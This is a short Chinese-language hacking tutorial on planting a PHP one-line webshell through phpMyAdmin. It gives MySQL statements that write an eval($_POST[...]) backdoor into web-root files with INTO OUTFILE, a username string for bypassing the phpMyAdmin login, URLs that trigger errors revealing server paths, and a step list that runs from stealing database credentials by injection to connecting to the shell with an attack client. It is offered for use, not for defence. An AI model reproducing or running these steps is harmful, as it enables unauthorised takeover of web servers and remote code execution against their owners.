phpmyadmin写一句话木马拿webshell思路（骇客协会）

 先介绍

MySQL导出一句话木马的语法（我个人比较喜欢说思路）

Drop TABLE IF EXISTS temp; //如果存在temp就删掉

 Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段

 Insert INTO temp (cmd) VALUES('<? php eval_r($_POST[cmd]);?>'); //把一句话木马插入到temp表

 Select cmd from temp into outfile 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php

 Drop TABLE IF EXISTS temp; //删除temp

 简化     Select '<? php eval_r($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

（以上的意思大概看看就可以下面来碰运气）

利用方法：用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号，最后一个为英文双引号)

附上几个php爆绝对路径的办法：

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

利用mysql数据库爆网站绝对路径方法

 使用phpmyadmin的某个文件报错

phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php

phpMyAdmin/libraries/select_lang.lib.php

1.首先通过注入获取mysql数据库的用户名和密码

2.通过相关渠道获取mysql数据库的路径

3.使用用户名和密码登陆mysql

4.获取网站可写目录的绝对路径

5.点击进入sql编辑器，输入上述代码，将一句话木马写入网站

6.使用菜刀连接一句话

使用phpmyadmin中的sql语句

写文件：

select '<?php @eval($_POST[1])?>' into outfile '/data/www/XXX/cp/log.php'

最后的/cp/log.php的文件名可以任意起的，不是固定的。

登录phpMyAdmin，写入一句话d:/wwwroot/1.php

1. select '<?eval($_POST[cmd]);?>' into outfile 'd:/wwwroot/1.php';